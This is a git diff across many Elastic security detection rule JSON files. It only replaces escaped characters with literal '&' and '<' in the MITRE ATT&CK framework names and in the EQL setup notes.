a/packages/security_detection_engine/kibana/security_rule/b51dbc92-84e2-4af1-ba47-65183fcd0c57_4.json b/packages/security_detection_engine/kibana/security_rule/b51dbc92-84e2-4af1-ba47-65183fcd0c57_4.json index d91170fddb2..f12a0fe0cc0 100644 --- a/packages/security_detection_engine/kibana/security_rule/b51dbc92-84e2-4af1-ba47-65183fcd0c57_4.json +++ b/packages/security_detection_engine/kibana/security_rule/b51dbc92-84e2-4af1-ba47-65183fcd0c57_4.json @@ -78,7 +78,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/b5877334-677f-4fb9-86d5-a9721274223b_104.json b/packages/security_detection_engine/kibana/security_rule/b5877334-677f-4fb9-86d5-a9721274223b_104.json index 9168186d1cd..8748b1b976c 100644 --- a/packages/security_detection_engine/kibana/security_rule/b5877334-677f-4fb9-86d5-a9721274223b_104.json +++ b/packages/security_detection_engine/kibana/security_rule/b5877334-677f-4fb9-86d5-a9721274223b_104.json @@ -60,7 +60,7 @@ ], "risk_score": 47, "rule_id": "b5877334-677f-4fb9-86d5-a9721274223b", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -73,7 +73,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/b5877334-677f-4fb9-86d5-a9721274223b_105.json b/packages/security_detection_engine/kibana/security_rule/b5877334-677f-4fb9-86d5-a9721274223b_105.json index 51f3a575cd1..73701673466 100644 --- a/packages/security_detection_engine/kibana/security_rule/b5877334-677f-4fb9-86d5-a9721274223b_105.json +++ b/packages/security_detection_engine/kibana/security_rule/b5877334-677f-4fb9-86d5-a9721274223b_105.json @@ -60,7 +60,7 @@ ], "risk_score": 47, "rule_id": "b5877334-677f-4fb9-86d5-a9721274223b", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -72,7 +72,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/b5877334-677f-4fb9-86d5-a9721274223b_106.json b/packages/security_detection_engine/kibana/security_rule/b5877334-677f-4fb9-86d5-a9721274223b_106.json index 2762a309d24..375e0205a13 100644 --- a/packages/security_detection_engine/kibana/security_rule/b5877334-677f-4fb9-86d5-a9721274223b_106.json +++ b/packages/security_detection_engine/kibana/security_rule/b5877334-677f-4fb9-86d5-a9721274223b_106.json @@ -60,7 +60,7 @@ ], "risk_score": 47, "rule_id": "b5877334-677f-4fb9-86d5-a9721274223b", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -73,7 +73,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/b5877334-677f-4fb9-86d5-a9721274223b_107.json b/packages/security_detection_engine/kibana/security_rule/b5877334-677f-4fb9-86d5-a9721274223b_107.json index eb32fca18e5..aa18401d45e 100644 --- a/packages/security_detection_engine/kibana/security_rule/b5877334-677f-4fb9-86d5-a9721274223b_107.json +++ b/packages/security_detection_engine/kibana/security_rule/b5877334-677f-4fb9-86d5-a9721274223b_107.json @@ -60,7 +60,7 @@ ], "risk_score": 47, "rule_id": "b5877334-677f-4fb9-86d5-a9721274223b", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -74,7 +74,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -96,7 +96,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/b5877334-677f-4fb9-86d5-a9721274223b_108.json b/packages/security_detection_engine/kibana/security_rule/b5877334-677f-4fb9-86d5-a9721274223b_108.json index e62cd86cabd..23f3c524fa9 100644 --- a/packages/security_detection_engine/kibana/security_rule/b5877334-677f-4fb9-86d5-a9721274223b_108.json +++ b/packages/security_detection_engine/kibana/security_rule/b5877334-677f-4fb9-86d5-a9721274223b_108.json @@ -60,7 +60,7 @@ ], "risk_score": 47, "rule_id": "b5877334-677f-4fb9-86d5-a9721274223b", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -74,7 +74,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -96,7 +96,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/b5ea4bfe-a1b2-421f-9d47-22a75a6f2921_105.json b/packages/security_detection_engine/kibana/security_rule/b5ea4bfe-a1b2-421f-9d47-22a75a6f2921_105.json index 7158d6f8238..909e1217d7e 100644 --- a/packages/security_detection_engine/kibana/security_rule/b5ea4bfe-a1b2-421f-9d47-22a75a6f2921_105.json +++ b/packages/security_detection_engine/kibana/security_rule/b5ea4bfe-a1b2-421f-9d47-22a75a6f2921_105.json @@ -55,7 +55,7 @@ ], "risk_score": 73, "rule_id": "b5ea4bfe-a1b2-421f-9d47-22a75a6f2921", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/b5ea4bfe-a1b2-421f-9d47-22a75a6f2921_106.json b/packages/security_detection_engine/kibana/security_rule/b5ea4bfe-a1b2-421f-9d47-22a75a6f2921_106.json index 0beba236bfb..7e8d32ba94b 100644 --- a/packages/security_detection_engine/kibana/security_rule/b5ea4bfe-a1b2-421f-9d47-22a75a6f2921_106.json +++ b/packages/security_detection_engine/kibana/security_rule/b5ea4bfe-a1b2-421f-9d47-22a75a6f2921_106.json @@ -55,7 +55,7 @@ ], "risk_score": 73, "rule_id": "b5ea4bfe-a1b2-421f-9d47-22a75a6f2921", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/b5ea4bfe-a1b2-421f-9d47-22a75a6f2921_107.json b/packages/security_detection_engine/kibana/security_rule/b5ea4bfe-a1b2-421f-9d47-22a75a6f2921_107.json index e349886f20a..61497a77440 100644 --- a/packages/security_detection_engine/kibana/security_rule/b5ea4bfe-a1b2-421f-9d47-22a75a6f2921_107.json +++ b/packages/security_detection_engine/kibana/security_rule/b5ea4bfe-a1b2-421f-9d47-22a75a6f2921_107.json @@ -55,7 +55,7 @@ ], "risk_score": 73, "rule_id": "b5ea4bfe-a1b2-421f-9d47-22a75a6f2921", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/b5ea4bfe-a1b2-421f-9d47-22a75a6f2921_108.json b/packages/security_detection_engine/kibana/security_rule/b5ea4bfe-a1b2-421f-9d47-22a75a6f2921_108.json index b7cebdee7fc..38247dff313 100644 --- a/packages/security_detection_engine/kibana/security_rule/b5ea4bfe-a1b2-421f-9d47-22a75a6f2921_108.json +++ b/packages/security_detection_engine/kibana/security_rule/b5ea4bfe-a1b2-421f-9d47-22a75a6f2921_108.json @@ -55,7 +55,7 @@ ], "risk_score": 73, "rule_id": "b5ea4bfe-a1b2-421f-9d47-22a75a6f2921", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "high", "tags": [ "Domain: Endpoint", @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/b627cd12-dac4-11ec-9582-f661ea17fbcd_101.json b/packages/security_detection_engine/kibana/security_rule/b627cd12-dac4-11ec-9582-f661ea17fbcd_101.json index 902536dd480..e7c8aded4d6 100644 --- a/packages/security_detection_engine/kibana/security_rule/b627cd12-dac4-11ec-9582-f661ea17fbcd_101.json +++ b/packages/security_detection_engine/kibana/security_rule/b627cd12-dac4-11ec-9582-f661ea17fbcd_101.json @@ -43,7 +43,7 @@ ], "risk_score": 47, "rule_id": "b627cd12-dac4-11ec-9582-f661ea17fbcd", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/b627cd12-dac4-11ec-9582-f661ea17fbcd_102.json b/packages/security_detection_engine/kibana/security_rule/b627cd12-dac4-11ec-9582-f661ea17fbcd_102.json index 8c78c8eacc5..3609dee4698 100644 --- a/packages/security_detection_engine/kibana/security_rule/b627cd12-dac4-11ec-9582-f661ea17fbcd_102.json +++ b/packages/security_detection_engine/kibana/security_rule/b627cd12-dac4-11ec-9582-f661ea17fbcd_102.json @@ -43,7 +43,7 @@ ], "risk_score": 47, "rule_id": "b627cd12-dac4-11ec-9582-f661ea17fbcd", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -55,7 +55,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/b627cd12-dac4-11ec-9582-f661ea17fbcd_103.json b/packages/security_detection_engine/kibana/security_rule/b627cd12-dac4-11ec-9582-f661ea17fbcd_103.json index d9579f35117..a61e6afc916 100644 --- a/packages/security_detection_engine/kibana/security_rule/b627cd12-dac4-11ec-9582-f661ea17fbcd_103.json +++ b/packages/security_detection_engine/kibana/security_rule/b627cd12-dac4-11ec-9582-f661ea17fbcd_103.json @@ -43,7 +43,7 @@ ], "risk_score": 47, "rule_id": "b627cd12-dac4-11ec-9582-f661ea17fbcd", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -55,7 +55,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/b627cd12-dac4-11ec-9582-f661ea17fbcd_104.json b/packages/security_detection_engine/kibana/security_rule/b627cd12-dac4-11ec-9582-f661ea17fbcd_104.json index 82fd0707809..38c21fb87f6 100644 --- a/packages/security_detection_engine/kibana/security_rule/b627cd12-dac4-11ec-9582-f661ea17fbcd_104.json +++ b/packages/security_detection_engine/kibana/security_rule/b627cd12-dac4-11ec-9582-f661ea17fbcd_104.json @@ -43,7 +43,7 @@ ], "risk_score": 47, "rule_id": "b627cd12-dac4-11ec-9582-f661ea17fbcd", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/b627cd12-dac4-11ec-9582-f661ea17fbcd_105.json b/packages/security_detection_engine/kibana/security_rule/b627cd12-dac4-11ec-9582-f661ea17fbcd_105.json index dcd5fe51873..7cac9457c21 100644 --- a/packages/security_detection_engine/kibana/security_rule/b627cd12-dac4-11ec-9582-f661ea17fbcd_105.json +++ b/packages/security_detection_engine/kibana/security_rule/b627cd12-dac4-11ec-9582-f661ea17fbcd_105.json @@ -42,7 +42,7 @@ ], "risk_score": 47, "rule_id": "b627cd12-dac4-11ec-9582-f661ea17fbcd", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -55,7 +55,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/b64b183e-1a76-422d-9179-7b389513e74d_104.json b/packages/security_detection_engine/kibana/security_rule/b64b183e-1a76-422d-9179-7b389513e74d_104.json index 688896dbb8f..b5e58a6ad41 100644 --- a/packages/security_detection_engine/kibana/security_rule/b64b183e-1a76-422d-9179-7b389513e74d_104.json +++ b/packages/security_detection_engine/kibana/security_rule/b64b183e-1a76-422d-9179-7b389513e74d_104.json @@ -101,7 +101,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", @@ -123,7 +123,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/b64b183e-1a76-422d-9179-7b389513e74d_105.json b/packages/security_detection_engine/kibana/security_rule/b64b183e-1a76-422d-9179-7b389513e74d_105.json index 3181953479c..172850885ba 100644 --- a/packages/security_detection_engine/kibana/security_rule/b64b183e-1a76-422d-9179-7b389513e74d_105.json +++ b/packages/security_detection_engine/kibana/security_rule/b64b183e-1a76-422d-9179-7b389513e74d_105.json @@ -100,7 +100,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", @@ -122,7 +122,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/b64b183e-1a76-422d-9179-7b389513e74d_106.json b/packages/security_detection_engine/kibana/security_rule/b64b183e-1a76-422d-9179-7b389513e74d_106.json index 821bccaad1e..0e0e4c6f183 100644 --- a/packages/security_detection_engine/kibana/security_rule/b64b183e-1a76-422d-9179-7b389513e74d_106.json +++ b/packages/security_detection_engine/kibana/security_rule/b64b183e-1a76-422d-9179-7b389513e74d_106.json @@ -101,7 +101,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", @@ -123,7 +123,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/b64b183e-1a76-422d-9179-7b389513e74d_107.json b/packages/security_detection_engine/kibana/security_rule/b64b183e-1a76-422d-9179-7b389513e74d_107.json index 90de7cade8d..56a82949af2 100644 --- a/packages/security_detection_engine/kibana/security_rule/b64b183e-1a76-422d-9179-7b389513e74d_107.json +++ b/packages/security_detection_engine/kibana/security_rule/b64b183e-1a76-422d-9179-7b389513e74d_107.json @@ -101,7 +101,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", @@ -123,7 +123,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/b6dce542-2b75-4ffb-b7d6-38787298ba9d_102.json b/packages/security_detection_engine/kibana/security_rule/b6dce542-2b75-4ffb-b7d6-38787298ba9d_102.json index 50d6cb8788c..18e5675ec5c 100644 --- a/packages/security_detection_engine/kibana/security_rule/b6dce542-2b75-4ffb-b7d6-38787298ba9d_102.json +++ b/packages/security_detection_engine/kibana/security_rule/b6dce542-2b75-4ffb-b7d6-38787298ba9d_102.json @@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0009", "name": "Collection", @@ -73,7 +73,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0010", "name": "Exfiltration", diff --git a/packages/security_detection_engine/kibana/security_rule/b6dce542-2b75-4ffb-b7d6-38787298ba9d_103.json b/packages/security_detection_engine/kibana/security_rule/b6dce542-2b75-4ffb-b7d6-38787298ba9d_103.json index 0d8cad42b7b..751072f754a 100644 --- a/packages/security_detection_engine/kibana/security_rule/b6dce542-2b75-4ffb-b7d6-38787298ba9d_103.json +++ b/packages/security_detection_engine/kibana/security_rule/b6dce542-2b75-4ffb-b7d6-38787298ba9d_103.json @@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0009", "name": "Collection", @@ -71,7 +71,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0010", "name": "Exfiltration", diff --git a/packages/security_detection_engine/kibana/security_rule/b719a170-3bdb-4141-b0e3-13e3cf627bfe_102.json b/packages/security_detection_engine/kibana/security_rule/b719a170-3bdb-4141-b0e3-13e3cf627bfe_102.json index 714378e68ed..434b607d06e 100644 --- a/packages/security_detection_engine/kibana/security_rule/b719a170-3bdb-4141-b0e3-13e3cf627bfe_102.json +++ b/packages/security_detection_engine/kibana/security_rule/b719a170-3bdb-4141-b0e3-13e3cf627bfe_102.json @@ -55,7 +55,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/b719a170-3bdb-4141-b0e3-13e3cf627bfe_103.json b/packages/security_detection_engine/kibana/security_rule/b719a170-3bdb-4141-b0e3-13e3cf627bfe_103.json index 3ef80f7680f..31e6ee90827 100644 --- a/packages/security_detection_engine/kibana/security_rule/b719a170-3bdb-4141-b0e3-13e3cf627bfe_103.json +++ b/packages/security_detection_engine/kibana/security_rule/b719a170-3bdb-4141-b0e3-13e3cf627bfe_103.json @@ -51,7 +51,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/b719a170-3bdb-4141-b0e3-13e3cf627bfe_104.json b/packages/security_detection_engine/kibana/security_rule/b719a170-3bdb-4141-b0e3-13e3cf627bfe_104.json index 35e6abf1a94..a3bea1580f7 100644 --- a/packages/security_detection_engine/kibana/security_rule/b719a170-3bdb-4141-b0e3-13e3cf627bfe_104.json +++ b/packages/security_detection_engine/kibana/security_rule/b719a170-3bdb-4141-b0e3-13e3cf627bfe_104.json @@ -51,7 +51,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/b719a170-3bdb-4141-b0e3-13e3cf627bfe_105.json b/packages/security_detection_engine/kibana/security_rule/b719a170-3bdb-4141-b0e3-13e3cf627bfe_105.json index c1858d49e6d..020b9f480b6 100644 --- a/packages/security_detection_engine/kibana/security_rule/b719a170-3bdb-4141-b0e3-13e3cf627bfe_105.json +++ b/packages/security_detection_engine/kibana/security_rule/b719a170-3bdb-4141-b0e3-13e3cf627bfe_105.json @@ -51,7 +51,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/b719a170-3bdb-4141-b0e3-13e3cf627bfe_206.json b/packages/security_detection_engine/kibana/security_rule/b719a170-3bdb-4141-b0e3-13e3cf627bfe_206.json index 39a5a4f2003..0d522e24f18 100644 --- a/packages/security_detection_engine/kibana/security_rule/b719a170-3bdb-4141-b0e3-13e3cf627bfe_206.json +++ b/packages/security_detection_engine/kibana/security_rule/b719a170-3bdb-4141-b0e3-13e3cf627bfe_206.json @@ -51,7 +51,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/b8075894-0b62-46e5-977c-31275da34419_102.json b/packages/security_detection_engine/kibana/security_rule/b8075894-0b62-46e5-977c-31275da34419_102.json index 2ed1862445a..39525650315 100644 --- a/packages/security_detection_engine/kibana/security_rule/b8075894-0b62-46e5-977c-31275da34419_102.json +++ b/packages/security_detection_engine/kibana/security_rule/b8075894-0b62-46e5-977c-31275da34419_102.json @@ -54,7 +54,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/b8075894-0b62-46e5-977c-31275da34419_103.json b/packages/security_detection_engine/kibana/security_rule/b8075894-0b62-46e5-977c-31275da34419_103.json index 142fa19601f..81c712ec837 100644 --- a/packages/security_detection_engine/kibana/security_rule/b8075894-0b62-46e5-977c-31275da34419_103.json +++ b/packages/security_detection_engine/kibana/security_rule/b8075894-0b62-46e5-977c-31275da34419_103.json @@ -51,7 +51,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/b8075894-0b62-46e5-977c-31275da34419_104.json b/packages/security_detection_engine/kibana/security_rule/b8075894-0b62-46e5-977c-31275da34419_104.json index 9ff8f8552a8..be2d8454efa 100644 --- a/packages/security_detection_engine/kibana/security_rule/b8075894-0b62-46e5-977c-31275da34419_104.json +++ b/packages/security_detection_engine/kibana/security_rule/b8075894-0b62-46e5-977c-31275da34419_104.json @@ -51,7 +51,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/b8075894-0b62-46e5-977c-31275da34419_205.json b/packages/security_detection_engine/kibana/security_rule/b8075894-0b62-46e5-977c-31275da34419_205.json index 1562e1e4a2e..734277f287a 100644 --- a/packages/security_detection_engine/kibana/security_rule/b8075894-0b62-46e5-977c-31275da34419_205.json +++ b/packages/security_detection_engine/kibana/security_rule/b8075894-0b62-46e5-977c-31275da34419_205.json @@ -51,7 +51,7 @@ ], "threat": [ { 